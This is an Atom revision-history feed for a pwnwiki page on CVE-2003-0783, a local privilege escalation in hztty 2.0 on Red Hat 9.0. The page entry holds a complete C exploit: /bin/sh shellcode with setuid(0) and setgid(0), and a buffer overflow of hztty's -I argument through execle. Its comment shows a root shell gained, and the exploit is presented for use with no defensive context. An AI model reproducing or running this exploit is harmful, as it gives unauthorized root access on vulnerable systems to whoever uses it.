<?xml version="1.0"?>
<feed xmlns="http://www.w3.org/2005/Atom" xml:lang="chinese">
	<id>https://pwnwiki.com/index.php?action=history&amp;feed=atom&amp;title=CVE-2003-0783_hztty_2.0_%28RedHat_9.0%29_%E6%9C%AC%E5%9C%B0%E7%89%B9%E6%AC%8A%E6%8F%90%E5%8D%87%E6%BC%8F%E6%B4%9E</id>
	<title>CVE-2003-0783 hztty 2.0 (RedHat 9.0) 本地特權提升漏洞 - Revision history</title>
	<link rel="self" type="application/atom+xml" href="https://pwnwiki.com/index.php?action=history&amp;feed=atom&amp;title=CVE-2003-0783_hztty_2.0_%28RedHat_9.0%29_%E6%9C%AC%E5%9C%B0%E7%89%B9%E6%AC%8A%E6%8F%90%E5%8D%87%E6%BC%8F%E6%B4%9E"/>
	<link rel="alternate" type="text/html" href="https://pwnwiki.com/index.php?title=CVE-2003-0783_hztty_2.0_(RedHat_9.0)_%E6%9C%AC%E5%9C%B0%E7%89%B9%E6%AC%8A%E6%8F%90%E5%8D%87%E6%BC%8F%E6%B4%9E&amp;action=history"/>
	<updated>2026-04-14T03:13:35Z</updated>
	<subtitle>Revision history for this page on the wiki</subtitle>
	<generator>MediaWiki 1.35.1</generator>
	<entry>
		<id>https://pwnwiki.com/index.php?title=CVE-2003-0783_hztty_2.0_(RedHat_9.0)_%E6%9C%AC%E5%9C%B0%E7%89%B9%E6%AC%8A%E6%8F%90%E5%8D%87%E6%BC%8F%E6%B4%9E&amp;diff=2071&amp;oldid=prev</id>
		<title>Pwnwiki: Created page with &quot;==EXP== &lt;pre&gt; /*  0x333hztty =&gt; hztty 2.0 local root exploit  *  *  *	more info : Debian Security Advisory DSA 385-1  *  *	*note* I adjusted some part of hztty's code since  *...&quot;</title>
		<link rel="alternate" type="text/html" href="https://pwnwiki.com/index.php?title=CVE-2003-0783_hztty_2.0_(RedHat_9.0)_%E6%9C%AC%E5%9C%B0%E7%89%B9%E6%AC%8A%E6%8F%90%E5%8D%87%E6%BC%8F%E6%B4%9E&amp;diff=2071&amp;oldid=prev"/>
		<updated>2021-05-03T12:38:03Z</updated>

		<summary type="html">&lt;p&gt;Created page with &amp;quot;==EXP== &amp;lt;pre&amp;gt; /*  0x333hztty =&amp;gt; hztty 2.0 local root exploit  *  *  *	more info : Debian Security Advisory DSA 385-1  *  *	*note* I adjusted some part of hztty&amp;#039;s code since  *...&amp;quot;&lt;/p&gt;
&lt;p&gt;&lt;b&gt;New page&lt;/b&gt;&lt;/p&gt;&lt;div&gt;==EXP==&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
/*  0x333hztty =&amp;gt; hztty 2.0 local root exploit&lt;br /&gt;
 *&lt;br /&gt;
 *&lt;br /&gt;
 *	more info : Debian Security Advisory DSA 385-1&lt;br /&gt;
 *&lt;br /&gt;
 *	*note* I adjusted some part of hztty's code since&lt;br /&gt;
 *	there were some errors. hope this will not influence&lt;br /&gt;
 *	exploitation :&amp;gt; tested against Red Hat 9.0 :&lt;br /&gt;
 *&lt;br /&gt;
 * [c0wboy@0x333 c0wboy]$ gcc 0x333hztty.c -o k&lt;br /&gt;
 * [c0wboy@0x333 c0wboy]$ ./k&lt;br /&gt;
 *&lt;br /&gt;
 *  ---  local root exploit for hztty 2.0  ---&lt;br /&gt;
 *  ---  coded by c0wboy ~ 0x33  ---&lt;br /&gt;
 * &lt;br /&gt;
 * sh-2.05b# [./hztty started]  [using /dev/ttyp6]&lt;br /&gt;
 * sh-2.05b$ sh-2.05b# uid=0(root) gid=0(root) groups=500(c0wboy)&lt;br /&gt;
 * sh-2.05b#&lt;br /&gt;
 *&lt;br /&gt;
 *  coded by c0wboy &lt;br /&gt;
 *&lt;br /&gt;
 *  (c) 0x333 Outsiders Security Labs&lt;br /&gt;
 *&lt;br /&gt;
 */&lt;br /&gt;
&lt;br /&gt;
#include &amp;lt;stdio.h&amp;gt;&lt;br /&gt;
#include &amp;lt;unistd.h&amp;gt;&lt;br /&gt;
&lt;br /&gt;
#define BIN    &amp;quot;./hztty&amp;quot;&lt;br /&gt;
#define SIZE   272&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
unsigned char shellcode[] =&lt;br /&gt;
	&amp;quot;\x31\xdb\x89\xd8\xb0\x17\xcd\x80\x31\xdb\x89\xd8&amp;quot;&lt;br /&gt;
	&amp;quot;\xb0\x2e\xcd\x80\x31\xc0\x50\x68\x2f\x2f\x73\x68&amp;quot;&lt;br /&gt;
	&amp;quot;\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31&amp;quot;&lt;br /&gt;
	&amp;quot;\xd2\xb0\x0b\xcd\x80&amp;quot; ;&lt;br /&gt;
&lt;br /&gt;
int main()&lt;br /&gt;
{&lt;br /&gt;
	int i;&lt;br /&gt;
	char out[SIZE];&lt;br /&gt;
	char *own[] = { shellcode, 0x0 };&lt;br /&gt;
&lt;br /&gt;
	int *hztty = (int *)(out);&lt;br /&gt;
	int ret = 0xbffffffa - strlen(BIN) - strlen(shellcode);&lt;br /&gt;
&lt;br /&gt;
	for (i=0 ; i&amp;lt;SIZE-1 ; i+=4)&lt;br /&gt;
		*hztty++ = ret;&lt;br /&gt;
&lt;br /&gt;
	hztty = 0x0;&lt;br /&gt;
&lt;br /&gt;
	fprintf (stdout, &amp;quot;\n ---  local root exploit for hztty 2.0  ---\n&amp;quot;);&lt;br /&gt;
	fprintf (stdout, &amp;quot; ---  coded by c0wboy ~ www.0x333.org   ---\n\n&amp;quot;);&lt;br /&gt;
&lt;br /&gt;
	execle (BIN, BIN, &amp;quot;-I&amp;quot;, out, 0x0, own, 0x0);&lt;br /&gt;
}&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
// milw0rm.com [2003-09-21]&lt;br /&gt;
            &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;/div&gt;</summary>
		<author><name>Pwnwiki</name></author>
	</entry>
</feed>